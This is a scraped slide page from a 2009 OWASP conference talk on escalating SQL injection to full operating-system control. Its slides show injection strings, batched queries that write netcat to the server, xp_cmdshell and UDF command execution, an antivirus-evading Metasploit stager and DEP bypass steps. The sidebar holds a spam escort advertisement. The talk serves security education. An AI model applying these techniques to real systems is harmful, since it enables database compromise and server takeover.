Direct Code Execution - LinuxCon Japan 2014Direct Code Execution - LinuxCon Japan 2014
Direct Code Execution - LinuxCon Japan 2014
 
All experiment of java
All experiment of javaAll experiment of java
All experiment of java
 

Kürzlich hochgeladen

Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Neo4j
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxOnBoard
 
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024BookNet Canada
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 

Kürzlich hochgeladen (20)

Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptx
 
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptxVulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
 
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 

Advanced SQL injection to operating system full control (short version)

  • 1. Advanced SQL injection to operating system full control Bernardo Damele A. G. IT Security Engineer bernardo.damele@gmail.com +44 7788962949 Copyright © Bernardo Damele Assumpcao Guimaraes Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License. The OWASP Foundation http://www.owasp.org
  • 2. SQL injection definition SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL statements It is a common threat in web applications that lack of proper sanitization on user- supplied input used in SQL queries It does not affect only web applications! OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 2
  • 3. SQL injection techniques Boolean based blind SQL injection: par=1 AND ORD(MID((SQL query), Nth char, 1)) > Bisection num-- UNION query (inband) SQL injection: par=1 UNION ALL SELECT query-- Batched queries SQL injection: par=1; SQL query;-- OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 3
  • 4. How far can an attacker go by exploiting a SQL injection? OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 4
  • 5. Scope of the analysis Three database software: MySQL on Windows PostgreSQL on Windows and Linux Microsoft SQL Server on Windows Three web application languages: ASP on Microsoft IIS, Windows ASP.NET on Microsoft IIS, Windows PHP on Apache and Microsoft IIS OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 5
  • 6. Batched queries In SQL, batched queries are multiple SQL statements, separated by a semicolon, and passed to the database Example: SELECT col FROM table1 WHERE id=1; DROP table2; OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 6
  • 7. Batched queries support ASP ASP.NET PHP MySQL No Yes No PostgreSQL Yes Yes Yes Microsoft SQL Server Yes Yes Yes Programming languages and their DBMS connectors default support for batched queries OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 7
  • 8. File system write access OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 8
  • 9. File write access on MySQL On the attacker box: Encode the local file content to its corresponding hexadecimal string Split the hexadecimal encoded string into chunks long 1024 characters each OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 9
  • 10. File write access on MySQL Via batched queries SQL injection technique: CREATE TABLE footable(data longblob); INSERT INTO footable(data) VALUES (0x4d5a90…610000); UPDATE footable SET data=CONCAT(data, 0xaa270000…000000); […]; SELECT data FROM footable INTO DUMPFILE 'C:/WINDOWS/Temp/nc.exe'; OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 10
  • 11. File write access on PostgreSQL On the attacker box: Encode the local file content to its corresponding base64 string Split the base64 encoded string into chunks long 1024 characters each OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 11
  • 12. File write access on PostgreSQL Via batched queries SQL injection technique: CREATE TABLE footable(data text); INSERT INTO footable(data) VALUES ('TVqQ…'); UPDATE footable SET data=data||'U8pp…vgDw'; […] SELECT lo_create(47); UPDATE pg_largeobject SET data=(DECODE((SELECT data FROM footable), 'base64')) WHERE loid=47; SELECT lo_export(47, 'C:/WINDOWS/Temp/nc.exe'); OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 12
  • 13. File write access on MS SQL Server Microsoft SQL Server can execute commands: xp_cmdshell() EXEC xp_cmdshell('echo … >> filepath') Session user must have CONTROL SERVER privilege On the attacker box: Split the file in chunks of 64Kb Convert each chunk to its plain text debug script format OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 13
  • 14. File write access on MS SQL Server Example of nc.exe: 00000000 4D 5A 90 00 03 00 00 00 00000008 04 00 00 00 FF FF 00 00 […] As a plain text debug script: n qqlbc // Create a temporary file rcx // Write the file size in f000 // the CX registry f 0100 f000 00 // Fill the segment with 0x00 e 100 4d 5a 90 00 03 […] // Write in memory all values e 114 00 00 00 00 40 […] […] w // Write the file to disk q // Quit debug.exe OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 14
  • 15. File write access on MS SQL Server Via batched queries SQL injection technique: For each debug script: EXEC master..xp_cmdshell ' echo n qqlbc >> C:WINDOWSTempzdfiq.scr & echo rcx >> C:WINDOWSTempzdfiq.scr & echo f000 >> C:WINDOWSTempzdfiq.scr & echo f 0100 f000 00 >> C:WINDOWSTempzdfiq.scr & […]' OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 15
  • 16. File write access on MS SQL Server EXEC master..xp_cmdshell ' cd C:WINDOWSTemp & debug < C:WINDOWSTempzdfiq.scr & del /F C:WINDOWSTempzdfiq.scr & copy /B /Y netcat+qqlbc netcat' EXEC master..xp_cmdshell ' cd C:WINDOWSTemp & move /Y netcat C:/WINDOWS/Temp/nc.exe' OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 16
  • 17. Operating system access OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 17
  • 18. User-Defined Function In SQL, a user-defined function is a custom function that can be evaluated in SQL statements UDF can be created from shared libraries that are compiled binary files Dynamic-link library on Windows Shared object on Linux OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 18
  • 19. UDF injection On the attacker box: Compile a shared library defining two UDF: sys_eval(cmd): executes cmd, returns stdout sys_exec(cmd): executes cmd, returns status The shared library can also be packed to speed up the upload via SQL injection: Windows: UPX for the dynamic-link library Linux: strip for the shared object OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 19
  • 20. UDF injection Via batched queries SQL injection technique: Upload the shared library to the DBMS file system Create the two UDF from the shared library Call either of the UDF to execute commands OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 20
  • 21. UDF injection on MySQL UDF Repository for MySQL lib_mysqludf_sys shared library: Approximately 6Kb packed Added sys_eval() to return command standard output Compliant with MySQL 5.0+ Works on all versions of MySQL from 4.1.0 Compatible with both Windows or Linux OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 21
  • 22. UDF injection on MySQL Via batched queries SQL injection technique: Fingerprint MySQL version Upload the shared library to a file system path where the MySQL looks for them CREATE FUNCTION sys_exec RETURNS int SONAME 'libudffmwgj.dll'; CREATE FUNCTION sys_eval RETURNS string SONAME 'libudffmwgj.dll'; OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 22
  • 23. UDF injection on PostgreSQL Ported MySQL shared library to PostgreSQL lib_postgresqludf_sys shared library: Approximately 6Kb packed C-Language Functions: sys_eval() and sys_exec() Compliant with PostgreSQL 8.2+ magic block Works on all versions of PostgreSQL from 8.0 Compatible with both Windows or Linux OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 23
  • 24. UDF injection on PostgreSQL Via batched queries SQL injection technique: Fingerprint PostgreSQL version Upload the shared library to any file system path where PostgreSQL has rw access CREATE OR REPLACE FUNCTION sys_exec(text) RETURNS int4 AS 'libudflenpx.dll', 'sys_exec' LANGUAGE C […]; CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS 'libudflenpx.dll', 'sys_eval' LANGUAGE C […]; OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 24
  • 25. Command execution on MS SQL Server xp_cmdshell() stored procedure: Session user must have sysadmin role or be specified as a proxy account Enabled by default on MS SQL Server 2000 or re-enabled via sp_addextendedproc OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 25
  • 26. Command execution on MS SQL Server Disabled by default on MS SQL Server 2005 and 2008, it can be: Re-enabled via sp_configure Created from scratch using shell object OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 26
  • 27. Out-of-band connection OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 27
  • 28. OOB connection definition Contrary to in-band connections (HTTP), it uses an alternative channel to return data This concept can be extended to establish a full- duplex connection between the attacker host and the database server Over this channel the attacker can have a command prompt or a graphical access (VNC) to the DBMS server OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 28
  • 29. A good friend: Metasploit Metasploit is a powerful open source exploitation framework Post-exploitation in a SQL injection scenario SQL injection as a stepping stone for OOB channel using Metasploit can be achieved Requires file system write access and command execution via in-band connection – already achieved OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 29
  • 30. OOB via payload stager On the attacker box: Forge a stand-alone payload stager with msfpayload Encode it with msfencode to bypass AV Pack it with UPX to speed up the upload via SQL injection if the target OS is Windows OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 30
  • 31. OOB via payload stager Example of payload stager creation and encode: $ msfpayload windows/meterpreter/bind_tcp EXITFUNC=process LPORT=31486 R | msfencode –e x86/shikata_ga_nai -t exe -o stagerbvdcp.exe Payload stager compression: $ upx -9 –qq stagerbvdcp.exe The payload stager size is 9728 bytes, as a compressed executable its size is 2560 bytes OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 31
  • 32. OOB via payload stager On the attacker box: Run msfcli with multi/handler exploit Via batched queries SQL injection technique: Upload the stand-alone payload stager to the file system temporary folder of the DBMS Execute it via sys_exec() or xp_cmdshell() OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 32
  • 33. Stored procedure buffer overflow Discovered by Bernhard Mueller on December 4, 2008 sp_replwritetovarbin heap-based buffer overflow on Microsoft SQL Server 2000 SP4 and Microsoft SQL Server 2005 SP2 Patched by Microsoft on February 10, 2009 – MS09-004 OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 33
  • 34. Buffer overflow exploit Session user needs only EXECUTE privilege on the stored procedure – default Guido Landi wrote the first public stand- alone exploit for this vulnerability I added support for multi-stage payload and integrated it in sqlmap OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 34
  • 35. Data Execution Prevention DEP is a security feature that prevents code execution in memory pages not marked as executable It can be configured to allow exceptions Default settings allow exceptions: Windows 2003 SP1+: OptOut Windows 2008 SP0+: OptOut OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 35
  • 36. Bypass DEP When it is set to OptOut: Exception for sqlservr.exe in the registry Via bat file by calling reg Via reg file by passing it to regedit Via master..xp_regwrite Upload and execute a bat file which executes sc to restart the process OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 36
  • 37. Credits Guido Landi Alberto Revelli Alessandro Tanasi Metasploit development team More acknowledgments and references on the white paper, http://tinyurl.com/sqlmap1 OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 37
  • 38. Questions? OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 38
  • 39. Thanks for your attention! Bernardo Damele Assumpção Guimarães bernardo.damele@gmail.com http://bernardodamele.blogspot.com http://sqlmap.sourceforge.net OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 39